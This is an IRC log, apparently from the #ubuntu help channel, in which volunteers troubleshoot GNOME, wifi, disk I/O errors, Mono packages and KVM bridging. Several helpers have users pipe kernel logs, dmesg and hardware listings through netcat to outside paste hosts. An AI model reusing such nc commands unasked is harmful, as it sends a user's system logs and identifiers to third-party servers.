Two_Dogspurpleunicorn: copy/paste & execute via terminal> inxi -Fxztcm10 -c0 | nc termbin.com 9999 ## share link output here08:18
Two_Dogspastebin must hate something in the paste08:18
purpleunicornIs 9999 the port?08:21
Two_Dogspurpleunicorn: yes, everything up to ## is command line08:22
Two_Dogspurpleunicorn: i prefer gist but gist requires an account at github08:24
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purpleunicornIt says to use termbin hou need to use netcat and type in nc in terminal. I typed in nc but how do I use termbin on terminal08:24
purpleunicornI have a github account08:24
yuken_ok, so, I have a GPU that supports amdgpu on 18.04. How the hell do I actually use it?08:25
yuken_right now it's running radeon.08:25
yuken_VGA: Advanced Micro Devices, Inc. [AMD/ATI] Hawaii PRO [Radeon R9 290/390] @ Intel Corporation 4th Gen Core Processor DRAM Controller08:25
Two_Dogspurpleunicorn: everything from > to ## is command line, all one command08:26
purpleunicornOkay Two_Dogs08:27
purpleunicornI still have no clue how to use termbin... Two_Dogs08:28
purpleunicornI’m going to try gist08:28
Two_Dogsvia terminal> inxi -Fxztcm10 -c0 | nc termbin.com 9999 <-- its all one long line command purpleunicorn08:29
purpleunicornUgh omg okay...sorry I’m slow Two_Dogs08:29
Two_Dogspurpleunicorn: cool :)08:31
Two_Dogsone sec08:32
purpleunicornWould I be able to use this command for every issue I have in terminal instead of going on pastebin08:34
purpleunicornPaste bin*08:34
Two_Dogspurpleunicorn: yeap08:34
purpleunicornTwo_Dogs: nice08:34
Two_Dogsgist even better since you get a record of it, install 'gist' via 'sudo gem install gist' , you may need to install gems first,  i forget08:36
Two_Dogspurpleunicorn: i am plinking on gnome-shell for first time myself on virtualbox and i notice you got two instances of gnome-shell, is that normal?08:37
manjaroDeepinIs their any solution to use arrow keys in grub. So for no solution has been provided.08:37
purpleunicornYup I need gem first Two_Dogs08:37
purpleunicornI have no idea Two_Dogs08:37
purpleunicornIf you really want to know, ask Joe on ##uk08:38
purpleunicornHe helped me download Ubuntu08:38
purpleunicornOn virtual box08:38
Two_Dogsthis is #ubuntu purpleunicorn , someone here must know :)08:39
purpleunicornTrue Two_Dogs ignore what I said lol08:40
Two_Dogsto use gist you need to login via> gist --login08:40
Two_Dogspurpleunicorn: ^^08:40
FManTropyxshould I wait for the first point or throw in 18.04 now? is there a date for .1?08:42
Two_Dogspurpleunicorn: reboot the guest session, return, you can check for yourself after, 'inxi -tcm20' and looking for one instance of gnome-shell , not two08:42
cfhowlettFManTropyx, your box, your choice.  personally, LTS only and only at .108:43
purpleunicornOkay Two_Dogs08:43
FManTropyxright, I could give 18.04 a test run in a VM and put it in production when .108:45
Two_Dogspurpleunicorn i ran the same command and only found one instance https://git.io/vhqpv08:45
cfhowlettsane plan!08:45
FManTropyxthanks :)08:45
purpleunicornOkay Two_Dogs08:46
purpleunicornHold on08:46
purpleunicornI found it 4 times after typing that command Two_Dogs08:49
purpleunicornI’ll send you the link08:49
Two_Dogspurpleunicorn: since reboot?08:49
purpleunicornYes. I powered off Ubuntu and turned it back on08:50
Two_Dogssomeone here may be able to explain, i cant08:50
Two_Dogspurpleunicorn: gist works now?08:50
purpleunicornExplain what?08:50
purpleunicornI’m not sure08:51
Two_Dogsexplain more than one occurrence of 'gnome-shell'08:51
Two_Dogspurpleunicorn: did you 'gist --login'?08:51
purpleunicornI have to download gem08:52
purpleunicornI didn’t do that08:52
Two_Dogsok, first things first08:52
purpleunicornTwo_Dogs: here’s the link http://termbin.com/j37208:52
Two_Dogspurpleunicorn: copy/paste & execute via terminal> pstree -nsupa | nc termbin.com 9999 ## share link output here08:53
purpleunicornOh ok08:53
Two_Dogsi dont know how to reproduce more than one process of gnome-shell08:54
Two_Dogsthen again i am clueless to gnome08:54
purpleunicornI have no clue why it’s doing that either Two_Dogs08:55
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Two_Dogslets compare, shall we?08:59
purpleunicornOkay Two_Dogs08:59
Two_Dogspurpleunicorn mine exact same command, https://git.io/vhqp009:00
Two_Dogsits a mystery09:01
Two_Dogswho is the gnome-shell guru here who can give a hand with issue?09:02
purpleunicornLet me download gist and maybe it’ll help you to see what I’m doing09:03
Two_Dogspurpleunicorn: you start ubuntu and login or autologin?09:03
purpleunicornI login Two_Dogs09:03
purpleunicornTwo_Dogs: how do I download gist on GitHub09:09
Two_Dogspurpleunicorn: explain, gist is process executed on terminal, creates a 'gist-url'09:11
purpleunicornOh ok Two_Dogs09:11
Two_Dogspurpleunicorn: for instance> cat /etc/default/grub | gist <-- creates a gist of the file09:12
Two_Dogsor simpler> gist /some/file09:13
Two_Dogspurpleunicorn: at this rate you may want to ask joe on ##uk about the dups09:15
probooki was registered but i dont know how can i login with my nick name here ?09:16
purpleunicornTwo_Dogs: okay. Wait what’s dups?09:16
purpleunicornGo to ##freenode probook09:16
Two_Dogspurpleunicorn: the multiple 'gnome-shell' processes09:16
purpleunicornCorrection: #freenode probook09:17
purpleunicornOkay Two_Dogs09:17
Two_Dogs#probook <-- ?09:17
purpleunicornI don’t think he’s here but I will try09:17
Two_Dogsno one is in the house presently here09:18
purpleunicornLol I know09:18
purpleunicornThanks for trying to help Two_Dogs09:20
Two_Dogspurpleunicorn: it was fun09:20
Two_Dogspurpleunicorn: can you spare one more cpu for the guest?09:21
purpleunicornNo I can’t. It’s already on the lowest cpu. It’s on 109:23
Two_Dogsyes, on lowest, and you have how many on host?09:23
purpleunicornUmm let me see09:31
erasmusUmm let me see09:31
avengerSee, let me... ummm09:32
purpleunicornIt goes up to 8 CPU’s Two_Dogs09:32
Two_Dogspurpleunicorn: for the love of god, allow guest to have two09:33
purpleunicornHaha okay09:33
Two_Dogsthat should help some09:33
avengeryou get 1/2 of a processor and you'll like it09:33
purpleunicornYou never said that09:33
dan01I've logged in to google via Gnome, and the problem I have is that whenever I mount that google share, and open a file, it works, but it hase a strange cryptic name. Almost like it's a strage filesystem. Do you guys ecounter that? I'm talking about syncing google drive files09:54
dan01If I copy the files to my local system it's all fine. It's only if I open them directly in the mount that this happens09:54
purpleunicorndan01: I don’t have that issue because I haven’t use gnome with google09:59
purpleunicornI’m not much help really09:59
dan01the hack with that moved to dropbox. seems like the only service with native support for linux10:15
HanumaanI use mendeleydesktop tool, it is consistantly concuming CPU to 100% how to stop this or only medeleydesktop can rectify this?10:36
backboxvlc is not installing in my backbox10:51
cfhowlett!backbox | backbox10:51
ubottubackbox: Backbox Linux is not a supported derivative of Ubuntu and is thus not supported in #ubuntu. Please use #backbox on irc.autistici.org or https://forum.backbox.org/ for help with it.10:51
backboxso what should i do10:51
backboxthanks for your help10:52
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ducasseHanumaan: you would need to talk to them about that, it's their software to support10:59
JFox762im having trouble connecting to my Wired LAN11:03
DeathmistHey! I don't know if this is the right place, but I found a bug on the official Ubuntu Server 18.04 LTS installer: No partitions will show during manual partitioning, only "Add First Partition" despite the 16.04.4 LTS installer showing all of my partitions on the disk.11:05
cfhowlett!bug | Deathmist you can report it thusly11:05
ubottuDeathmist you can report it thusly: If you find a bug in Ubuntu or any of its derivatives, please report it using the command « ubuntu-bug <package> » - See https://help.ubuntu.com/community/ReportingBugs for other ways to report bugs.11:05
JFox762back, just wanted to check bios Settings... I can't connect to LAN... tried different wires and everything11:09
JFox762Im currently using the Ethernet cable that my desktop PC uses11:09
JFox762and it is a known good ethernet cable11:09
JFox762i can only connect via wifi... Ethernet shows "unplugged" in settings11:10
cfhowlett!patience | JFox76211:13
ubottuJFox762: Don't feel ignored and repeat your question quickly; if nobody knows your answer, nobody will answer you. While you wait, try searching https://help.ubuntu.com or https://ubuntuforums.org or https://askubuntu.com/11:13
JFox762ahh i think it is hardware11:13
SvetaJFox762: are you able to ping the router's ip?11:16
Two_DogsJFox762:  copy/paste & execute via terminal> journalctl --dmesg --pri=3 ## see any hint to broke ethernet?11:17
enycIs there a problem with  packages.ubuntu.com  ??  I'm missing trusty-* and xenial-*  supported distros in all answers?11:26
geirhayeah, https://packages.ubuntu.com/search?keywords=bash&searchon=names&suite=all&section=all should've listed hits in all supported distros, but is limited to artful, bionic and cosmic11:34
ioriageirha, i think it'is a server issue11:44
ioriageirha, https://packages.ubuntu.com/trusty/0ad-dbg11:44
tee_my doods i seem to be completely unable to run teamspeak on the new ubuntu 18   ./executable seems to think its trying to look for a directory, and bash ./executable gets cannot execute binary, even though its chmod +x ?11:48
user01hi how can I find out how far along support is for raw images from a camera i went to buy in linux?11:53
tee_user01: look at the drivers the camera uses and see if ubuntu has them11:54
user01tee_, where do i find the drivers for nikon d500?11:54
user01its been out 2 years now11:55
tee_user01: oh, thats an actual camera camera, that should be fine to just plug in and turn on via usb, it'll attach its self as a media drive and you can pull the files off of that11:55
user01tee_, if jpeg, but i want raw image support11:55
user01so i can edit raws is ufraw etc11:56
tee_user01: that will depend on what the file type is, ubuntu has some available tools to read a variety of raw image file formats though11:56
tee_what's the file exstension?11:56
talxhello guys11:57
B1ack0phow can i add icons on desktop? (ubuntu 18.04)11:58
B1ack0pand enable new file on right click menu?11:58
talxI have Ubuntu 14.04.05 which reboots it self like every day or two11:58
user01tee_, im downloading some d500 raw files from a website now11:58
talxunknown reason - nothing shows on /var/log/messages11:58
user01tee_, https://cdn.static-bl.com/static/D500-Samples.zip11:58
tee_splendid, now if anyone could help me out with why Teamspeak3 won't launch in Ubuntu18 due to ./execucutable looks for a directory instead of running the .sh file, and bash ./exec saying cannot execute binary file, that'd be great12:00
ioriaB1ack0p, open Gnome-Tweaks and, under the Desktop tab, check the "Show Icons" setting12:00
user01tee_, i know my current really old camera is supported for raw and i do all image manipulation in gnu/linux id hate to have to stop that just because i upgrade my camera :P12:01
tomreyngeirha: I just filed bug #177364612:02
ubottubug 1773646 in pkg-website "packages.U.C does not show packages for trusty" [Undecided,New] https://launchpad.net/bugs/177364612:02
user01tee_, this is a huge file . . . one thing i don't like is camera manufacturers think they have to add more and more megapixels . . . i dont think there is much of a need to go much beyonf 18MP at the most12:02
talxanyone is up for helping ?12:03
B1ack0pioria: it is already enabled in gnome tweak tool but i cant add new icons on desktop12:03
user01i mean for godsake 4k ultra is something like around 10MP12:04
ioriaB1ack0p, cp a file in /Desktop12:04
B1ack0pi was aple to put in 16.04 but not anymore :S12:05
talxI have Ubuntu 14.04.05 which reboots it self like every day or two12:05
ioriaB1ack0p, what happens when you copy a file in ~/Desktop ?12:05
talxcan't find anything on /var/log/messages tho12:06
blackflowtalx: is there a trace of regular shutdown in the logs?12:06
B1ack0pioria: just it doesnt put on desktop12:06
B1ack0pno icon12:06
blackflowtalx: if not, I'd suspect hardware issues.12:06
B1ack0pit drags on mouse but doesnt put12:06
ioriaB1ack0p, please, check again  Gnome-Tweaks -> Desktop tab ->  "Show Icons"12:08
user01tee_, im not sure you can go by "file extension" as it is probably proprietary . . . i bet it has like "nef" extension but a new version . . .if this thing ever finishes downloading  . . .12:10
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talxno I havent seen any12:14
BluesKajHowdy all12:14
blackflowtalx: then it's likely some hardware issue12:14
talxblackflow: I thought so as well but the team I'm helping with this12:14
talxsays the hardware is fine12:15
blackflowtalx: could be something as simple as the sata cables needing reseating12:15
talxyea prolly12:15
talxthe box is 1000+ miles away from me12:15
talxcan't go check12:16
blackflowtalx: you could set up syslog forwarding and make sure kernel.* are as verbose as possible, and forward that to another machine. that way, in case it's disk issue, you'll get stuff logged elsewhere.12:16
talxis there a way to get a list of all the services that requests for the unit shutdown.target?12:16
blackflowtalx: kern.*12:16
BluesKajyeagh, sata cable connectors on the mobo are poorly designed , after a few months I have one that loosens and disconnects12:16
blackflowtalx: but the "team" could go check? :)12:17
BluesKajit disconnects the signal, but it ap[pears to be connected12:17
blackflowor whatever remote hands there are. have them reseat the cables, but also set up syslog forwarding so you can see what happens the next time it happens.12:18
blackflowcould also be something like faulty power management outside the server, so it's hard power loss.12:18
talxyea but I'm just going to check from the software pov12:19
blackflowtalx: maybe also run memtest? could be faulty part of a memory chip, and when it's hit, boom headshot.12:20
blackflowtalx: but then, the team probably did that already, if they ruled out HW?12:20
tomreynioria: i just filed bug #1773648 about 0ad-dbg on packages.U.C12:21
ubottubug 1773648 in pkg-website "Internal server error (500) for 0ad-dbg package info page" [Undecided,New] https://launchpad.net/bugs/177364812:21
ioriatomreyn, yeah12:22
talxyea maybe12:29
talxidk I'm just exploring12:29
talxI use who -b to see the reboot time but when I check it with journalctl --since <date> --until <date>12:35
talxits empty12:35
blackflowtalx: first of all I thought oyu said this was 14.04 (trusty)? no systemd there12:38
blackflowtalx: second, by default journald is configured for logging in ram only. need to set up persistent logging, or check /var/log/syslog.12:38
talxit does have systemd12:41
talxcat /etc/issue says 14.412:41
kiriuha> ubuntu12:43
kiriuha> tor connecting start linux12:43
blackflowtalx: oh, hum, you're right, iirc there _is_ systemd on trusty, but it's not default. is your server configured for systemd init?12:43
ioriatalx, ps -A | head -2   what it says ?12:45
Battlehey all, im trying to install mono, and it keeps telling me i have missing dependencies... ive added the repo from the mono website and apt-update but still missing?12:46
ioriaso ..12:46
kiriuhaso ..12:46
blackflowtalx: yah so journald won't be running and logging.12:46
talxI see12:47
blackflowtalx: really, set up remote logging and see if anything gets through the next time it reboots.12:47
talxbut when I use it12:47
talxit gives output12:47
talxhow would I do it12:47
talxits not in my network12:47
blackflowtalx: google for "rsyslog remote"12:48
Battlehere's the outpt when i run apt-get install mono-complete https://pastebin.com/0ayFBbVS12:48
blackflowalso consider using syslog-ng as that can log over TLS, if you don't trust the network.12:48
talxkernel: [497017.883739] end_request: I/O error, dev dm-27, sector 012:56
talxdoes it looks like something that cuase it ?12:56
blackflowtalx: yeah that looks like disk trouble. have smartmontools installed? see if s.m.a.r.t data from the disk indicate an issue13:01
talxwhat do you mean13:01
talxI'm not familiar with that13:02
talxcan it be run via the command line ?13:03
blackflowtalx: smartctl -a /dev/...  , the tool is in smartmontools package, will show disk SMART data, which could indicate trouble. look at attributed marked critical here:  https://en.wikipedia.org/wiki/S.M.A.R.T.#Known_ATA_S.M.A.R.T._attributes13:04
talxit wont make any changes to the system right ?13:04
blackflow*attributes.    note that absence of indicated error does NOT mean there's no error.13:04
talxits a prod env13:04
blackflowtalx: well, it _will_ install smartd, the smart monitoring daemon. but eh... if you have to ask these questions, perhaps you should not be touching prod environments AT ALL.13:05
EriC^blackflow: it doesn't install a smart daemon, what do you mean by smartd?13:06
EriC^blackflow: oh nevermind13:07
talxwas talking about using it13:08
EriC^never noticed smartd running13:08
talxanyway I can't install with apt-get I see13:08
talxblackflow: just reading logs basicly13:08
blackflowtalx: so there's nothing you can really do about it. perhaps leave that to whoever has the sysadmin rights there and knows what to do ;)13:09
blackflowEriC^: see that's why I hate debian based distros autostarting daemons on install.13:11
pushpakhi guys, I want to know how to turn off touchpad/trackpad while typing in ubuntu13:13
=== EriC^ is now known as EriC^^
talxlol blackflow13:21
talxI can't change anything but I think I found the disk fails13:21
jxcodemonkeypushpak: try something like this https://pastebin.com/yuah6KWs13:22
talxthanks blackflow although you got a little bit moody in the last minutes lol13:23
blackflowtalx: I'd hate to break your prod.13:25
talxI'm just sending the logs via mail13:27
talxsince they couldn't point the finger on whats wrong13:27
talxI get many I/O errors with dev dm-2713:28
camil_toughbookhello :)13:30
camil_toughbookjust want to say hi and test13:30
scooterd_help  guy have no wifi in settingscan only connect with wired13:44
talxservice network-manager restart13:45
EriC^^scooterd_: what does 'lshw -c network' give? use a pastebin13:46
scooterd_talx net work manager not work13:46
RDmonwhat is wrong? I can't ssh to my server from outside. I even didi Allow user in sshd file. (ubuntu 18.04)13:47
RDmoncould you give me some ideas?13:47
EriC^^RDmon: pastebin the output of ssh -vvv user@host13:47
scooterd_eric u want a url ??13:48
EriC^^scooterd_: yesh13:48
RDmonEriC^^: any idea on how to do that I am on windows using putty13:48
andrexscooterd_: pastebinit /etc/network/interfaces13:48
RDmonand connect to my server via vm sphire ATM13:49
scooterd_eric it does not give me a url13:49
EriC^^scooterd_: type "sudo lshw -c network | nc termview.me 9999"13:49
transhumanso whats with the changes to the host file, looks like in ubuntu 18.04 its a virtual file which you can no longer edit and have changes update immediately?13:50
scooterd_eric only been here few times how do i show if no url13:50
scooterd_eric it shows i should run program as super user ??13:51
EriC^^did you type sudo?13:51
scooterd_eris yes13:52
EriC^^it should give a link back termview.me/xxx13:52
scooterd_eric tes13:52
EriC^^give it here13:52
scooterd_description: Ethernet interface        product: AR8152 v2.0 Fast Ethernet        vendor: Qualcomm Atheros        physical id: 0        bus info: pci@0000:02:00.0        logical name: enp2s0        version: c1        serial: e8:9a:8f:ec:2b:fc        size: 100Mbit/s        capacity: 100Mbit/s        width: 64 bits        clock: 33MHz        capabilities: pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 1013:53
EriC^^scooterd_: give the link here not the paste13:53
scooterd_eric sorry but there is no url when i put the command in13:54
scooterd_eric sorry here http://termview.me/ui6w13:59
andrexscooterd_: you time/date is correct? what ping -c 3 google.com shows13:59
scooterd_andrex yes time date good14:00
codingCookiehello, where does ubuntu save its network connections?14:03
EriC^^scooterd_: does 'lspci | grep -i wireless' give anything?14:03
scooterd_eric no14:04
EriC^^codingCookie: /etc/NetworkManager/system-connections14:04
EriC^^scooterd_: what about 'lspci | grep Network' ?14:05
EriC^^anything about the wireless?14:05
scooterd_Eric no14:06
EriC^^scooterd_: type 'dmesg | nc termview.me 9999' and give the link14:06
codingCookieEriC^^: there is no networkmanager directory, im using 17.0114:06
EriC^^codingCookie: are you sure? it's case sensitive14:06
scooterd_Eric http://termview.me/4jlg14:07
codingCookieEriC^^: sorry, thanks14:08
EriC^^scooterd_: try 'rfkill list' anything about wifi listed?14:09
EriC^^codingCookie: np14:09
scooterd_Eric nothing this is weird cause i just shut down putter and this happen14:10
EriC^^scooterd_: is it a laptop?14:10
scooterd_Eric last week it happen14:10
scooterd_Eric yes14:10
EriC^^scooterd_: try to turn it off, remove battery, press power button for 10secs then put it back together14:11
EriC^^see if anything in the bios is listed about the wifi too scooterd_14:11
scooterd_Eric ok14:11
scooterd_eric i'll be back14:12
EriC^^asta la vista14:12
HackerIIel oh el14:13
codingCookieEriC^^: how about the network connections i did like http,tcp stuff. i want to build a bandwith monitor, i was interested in, if there are is  data stored on the computer14:14
scooterdEric still nothing14:17
EriC^^codingCookie: maybe 'nethogs' might help14:17
moffaAnyone having networking issues with KVM/Qemu's bridge in the past two days?14:17
EriC^^scooterd: anything in the bios about wifi?14:17
scooterdEric even in menu there is no menu for wifi14:18
scooterdEric no all blocks came back clean14:18
scooterdEric is it possible that card is dead ??14:20
EriC^^scooterd: dunno, maybe14:20
EriC^^do you know what kind it is? realtek broadcom etc?14:21
strangeqargoI had a card wich had no support for 14/16. I thought it was dead. Problem was those guys who assembled a computer put it either in a dead slot or put it wrong. Reattached and voila. Tho you have a laptop, so..14:21
strangeqargowindows livecd for testing maybe14:21
scooterdyea its wierd that by shutting putter doen and restart this happened14:22
ioriawhat is putter ?14:22
scooterdEric i have no idea what kind14:23
Battlehello, I could really use some help guys. i'm running ubuntu 16.04 and trying to install latest mono from their website, after adding repo, updating e.t.c the output i get is https://pastebin.com/0ayFBbVS14:24
EriC^^scooterd: can you upload 'sudo cat /var/log/kern.log | nc termview.me 9999'14:24
moffa@Battle did you add the repo here: https://www.mono-project.com/download/stable/#download-lin14:26
BattleI did14:29
BattleI followed all the commands there for Ubuntu 16.0414:29
scooterderic http://termview.me/xdha14:30
Battleand no errors from any of them14:30
EriC^^scooterd: maybe try a live usb to rule out an OS problem?14:34
Battle@moffa any other ideas? :(14:35
moffa@Battle and you did a sudo apt update14:35
scooterdEric dont have one14:35
Battle@moffa, yeah i did14:35
EriC^^scooterd: make one?14:35
Battle@moffa, it did a bunch of stuff as one would expect, no errors again14:35
scooterderic how  ??14:35
EriC^^!liveusb | scooterd14:35
ubottuscooterd: For information about installing Ubuntu from USB flash drives, see https://help.ubuntu.com/community/Installation/FromUSBStick - For a persistent live USB install, see: https://wiki.ubuntu.com/LiveUsbPendrivePersistent14:35
moffa@Battle if you want the nightly or newer than stable, you need to change stable-xenial to alpha-xenial beta-xenial nightly-xenial preview-xenial or whatever you want to use.14:36
Battle@moffa i just want the stable version, have i accidently enabled something else?14:36
EriC^^scooterd: which ubuntu version are you using right now?14:36
scooterderic 16.0414:37
tototorohi guys! do you maybe know is sensord service normally missing in Ubuntu 18.04? can't find it.14:37
moffa@Battle can you try a "sudo apt install -f" to see if it can fix stuff14:38
EriC^^tototoro: it's not installed by default14:38
Battle@moffa i saw that command on my google searchings and it didnt help :(14:38
EriC^^scooterd: download the iso http://releases.ubuntu.com/16.04.4/ubuntu-16.04.4-desktop-amd64.iso14:38
tototoro@Eric^^ i can't find it with apt-cache search neither14:39
tototoro@EriC^^ i can't find it with apt-cache search neither14:39
EriC^^!info sensord14:39
ubottuPackage sensord does not exist in bionic14:39
EriC^^tototoro: ^14:39
moffa@Battle what about a dpkg --configure -a14:40
Battle@moffa, i appear to have resolved it.... I googled how to delete repos, to start a fresh....and after deleting the repos, doing apt-get update, and then apt-get install mono-complete expecting to see errors or unkown package e.t.c it offered everything including dependences....14:40
Battlelemme check the version of mono its installing, it might be old...14:40
tototoro@EriC^^ i don't know what's info :(14:41
EriC^^tototoro: no i meant the bot said the package isnt available in bionic (18.04)14:41
moffa@Battle great :)14:41
moffa@Battle if it is, you just have to add the repo again, make sure you have the right one enabled14:41
tototoro@EriC^^ XD no info, right?14:42
Battle@moffa how do you check what ones are enabled/disabled? I just went to /etc/apt/sources.list.d and deleted what was there (only mono repos, 3 of them)14:42
tototoro@EriC^^ alright, thanks man!14:42
SporkWitcheeep, the twits from twitter are invading with all these unnecessary @ signs...14:43
moffa@Battle yes, there should be files in /etc/apt/sources.list.d/ with a file for each repo, you have to do an apt-get update if you change anything there.14:44
EriC^^tototoro: np14:44
Battle@moffa okay good, thanks thats what i assumed too.14:44
Battle@moffa do you have any experienec with OpenVZ btw? or any other form of virtualization software that will enable me to run an independent container or os? (preferbly one that would also allow windows but not required)14:45
SporkWitchBattle: deleting the entries for the repos you no longer want is sufficient, just do an apt update after to refresh.  Sometimes it'll be its own file, but other times it may be an additional line added to /etc/apt/sources.list14:45
SporkWitchBattle: If you have a question, just ask! For example: "I have a problem with ___; I'm running Debian version ___. When I try to do ___ I get the following output ___. I expected it to do ___." Don't ask if you can ask, if anyone uses it, or pick one person to ask. We're all volunteers; make it easy for us to help you. If you don't get an answer try a few hours later.14:45
moffa@Battle I use qemu/kvm but I'm currently having problems that just appears a few days ago14:46
Battle@Moffa it wasnt a "problem" I had with this, i was just wondering if there's one that would be recommended in the year of 2018. Until now i have been using openvz but for various reasons, would like to see what other options are available?14:46
Battlesorry that @ was for SporkWitch14:46
Battle@Moffa yes me too...14:47
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moffa@battle openvz is still popular, so is kvm/qem, xen, esxi14:47
SporkWitchBattle: the @ breaks the highlight anyway :)  this isn't twitter, you don't need to (and shouldn't) prepend anything to the name :)14:47
Battle@Moffa but with openvz XD14:47
moffathe @ works well for highlighting though --14:47
SporkWitchBattle: in any case, qemu-kvm is the go-to.  Very lightweight14:47
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SporkWitchmoffa: _some_ IRC clients will still trigger highlight if you prepend things like @ to a name, but it breaks others; it's a convention from other platforms, not IRC14:48
Battleso : is better?14:48
moffaahh the name: works too14:48
SporkWitchBattle: typically it'll be the name preceded by nothing or whitespace, followed by whitespace, comma, period, or colon14:48
moffaYou can use whatever you want, it just makes it easier when there are 5 conversations going on at the same time14:49
virtuosojOn 18.04, unplugged my computer, restarted and now my external monitor via HDMI doesn't detect.  How can I troubleshoot this?14:49
SporkWitch(though i think any non-letter character after the name will still work on most clients)14:49
moffavirtuosoj try connecting with VGA14:49
BattleSporkWitch: is it simple to install/setup kvm with publically visible secondary IP addresses bought from my providers? So far i've had a massive headache trying to get the network part done. other things work but not that...14:49
SporkWitchBattle: if you're looking to avoid some time in documentation, use a GUI front-end for it, such as virt-manager14:50
moffaBattle: a network bridge should work14:51
BattleSporkWitch: when i say not work i mean, ping from host <-> guest is fine, however anything outside of the same network, (its a dedicated server), is only one way.....outbound.14:51
moffaBattle that sounds like a routing / nat issue14:51
SporkWitchBattle: what moffa said14:51
SporkWitchif you have a second NIC, just give that NIC to the guest. Otherwise you'll need to bridge interfaces14:51
Battleyeah I couldnt figure out what i was doing wrong.... (this was when i had openvz)14:51
SporkWitchnever used openvz, couldn't comment; you'd have to ask them14:52
Battleyeah they're non-existent almost14:52
virtuosojmoffa, its an ultrabook where I have to connect an adapter to a special port to go into hdmi14:52
Battlemust rely on google searching and anyone who has experience with it, but it seems like openvz is being phased out now so perhaps KVM is the way to go14:52
BattleI just really hope its not hard to setup14:53
SporkWitchBattle: as mentioned, qemu-kvm is the go-to these days.  It's actually central to my next desktop build: second GPU passed through to the guest for near-native performance on Windows games that don't behave in WINE :P14:53
moffavirtuosoj does the splas page load and then the monitor stops working?14:53
BattleI spent the last few days, all day, trying to get openvz to work and officially gave up  XD14:53
moffaBattle virt-manager is great for new people14:53
BattleI'll give that a go14:53
Battlethank you14:53
virtuosojmoffa, no, computer boots up normally and just uses main display as if a monitor wasn't connected14:55
Jerryr we haveing fun yet14:55
SporkWitchvirtuosoj: try unplugging and replugging the adapter?14:55
moffavirtuosoj or going into display settings and see if the monitor is detected there14:55
virtuosojSporkWitch, tried it :(14:56
virtuosojmoffa, tried it :(14:56
virtuosojSomeone once told me about a setting that gets changed by different kernel versions that affects this issue?14:57
moffavirtuosoj I had the same issue with one of my monitors I had to cycle the inputs to get it to work.  I changed the hdmi cable and it worked fine after.. go figure14:57
unimatrix9hi there14:57
unimatrix9is there a way to add rightclick , like in 16.04 unity, where rightclick would show the downloads folder ( got 18.04 now with gnome )14:58
virtuosojThis is not the first time this has happened but it has resolved itself before... kind of seems random although I know that's not how computers work14:58
unimatrix9a how to somewhere maybe ..14:59
SporkWitchvirtuosoj: hard to say when you're dealing with notebooks; they tend to have lots of non-standard parts14:59
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Guest3803sorry wrong typing, I was trying to see the "help" from the application15:19
Guest3803"help" option15:20
SporkWitchGuest3803: press F115:20
Guest3803thanks. I found the help info.15:20
SporkWitchGuest3803: for reference, F1 is _the_ standard convention for bringing up help, regardless of operating system or application15:21
NemeXisbeep back?15:24
BattleSporkWitch: hey you still around by any chance?15:38
SporkWitchBattle: what's up?15:39
BattleSporkWitch: I took the advice and installed qemu-kvm with virtmanagaer and some other bits it needs. I used virt-manager from vnc desktop to manage it all, first thing was to create a bridge as suggested, and soon as i hit the finish button, the netowrk died XD15:40
moffaDid you add your current network card to the bridge?15:41
BattleSporkWitch it gave me a warning that it would be writing over an existing configration or something along those lines, i figured this would be expected since it is going to have to modify the main interface's config15:41
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Battlemoffa: yes, I went to network interfaces tab, selected brdige, hit forward, then selected activate on boot and now, then selected in the list at the bottom my main network (NIC)15:42
moffacan you run brctl show15:43
moffamake sure your tap and old network card is shown under interfacs15:43
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BattleI did not create nor know of that virbr0...15:44
Battlebut the br0 is the one i created in virt-manager15:44
Battleit does not list my main NIC, I assume this is normal?15:45
moffavirt-manager creates virbr0, that creates like a subnetwork just for your vms, I want my vms on my main network so I removed virbr0 and when the vm's are created, I selected br015:45
moffaisn't eth0 your main nic?15:45
Battleyes, correct15:45
Battleoh i see it, on teh right15:45
moffayes, I wouldn't use the autogenerated virbr0 and make sure virtmanager used br015:46
Battleas i no longer have VNC access remotely15:46
Battlehow can i remove this command based?15:46
Battle(the network is down so i am having to use a rescue mode provided by my providers which funny enough is vKVM)15:47
moffa# virsh net-destroy default # virsh net-undefine default # service libvirtd restart # ifconfig15:47
park123anyone online15:48
park123is happening to15:48
Battleokay ifconfig shows eth0 with a valid IP and all the data you would expect, as does br0 and lo15:48
Battlethere is no longer that virt015:48
moffaalso please check your /etc/network/interfaces to see if the bridge is setup properly on boot - you should remove eth0 configuration and use: auto br0 iface br0 inet dhcp  bridge_ports eth0 bridge_stp off     bridge_maxwait 015:48
park123remote debug15:49
moffadamn the formatting all screwed up, basically you should configure the bridge br0 instead of eth0.15:49
park123checking the server connecction15:49
park123what the fuck are you talking about man15:49
park123i cant understand15:50
moffapark123 what are you talking about?15:50
park123fuck the technicallity15:50
park123i am new to this chat room15:50
moffapark123 no need to be rude15:50
park123can anyone tell me what is this about?15:50
park123where are you from buddy?15:51
Battletroll sense tingling...15:51
park123i am from arjentina15:51
park123small village boy15:51
park123any chick15:52
Battlemoffa is it better to reboot the system , rather than restarting network services ?15:52
moffaBattle no you can restart the network, jsut to make sure its working then reboot to get out of recovery mode15:53
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Battlemoffa thanks that appears to have gotten the network back , at least the main IP anyway. whent rying to create the kvm virtual contaner again, it gives me this: RuntimeError: Domain has not existed.  You should be able to find more information in the logs16:06
smacktalkim having trouble installing conky manager16:06
smacktalkE: Unable to locate package conky-manager16:07
SporkWitchsmacktalk: apt search conky16:07
moffaBattle looks like a virt-manager bug can you delete the vm and start again, this time check your network card settings (force it to br0)16:08
smacktalkdid the apt search...said sorting Done, full text searh done16:09
Battlei havent created any vms just yet, soon as i saw lack of bridge when setting the first one up, I never got as far as hitting the 'create' button so to speak16:09
Battlemoffa, my network tab now does correctly display bridge when creating a vm too, so it appears to be working16:09
Battlemoffa http://prntscr.com/jn8sxk16:10
moffaI think you want to use the virtio model16:10
Battlemoffa I just noticed, it says "empty bridge" is that incorrect?16:10
moffadoes brctl show still have your bridge there16:10
Battleby incorrect i mean, broken? XD16:10
Battleill try16:11
moffaempty might refer to no vms being on it - I haven't used virtmanager in a while16:11
Battlei see no mention of eth0 on the right anymore16:11
smacktalkI got it...google is my hero once again16:12
smacktalkwget https://launchpad.net/~teejee2008/+archive/ubuntu/ppa/+files/conky-manager_2.4~136~ubuntu16.04.1_amd64.deb16:12
moffayou might need to edit your /etc/network/interfaces file to ensure eth0 is added to the bridge16:14
hatter82moffa i have a question for you16:14
matjam!ask | hatter8216:15
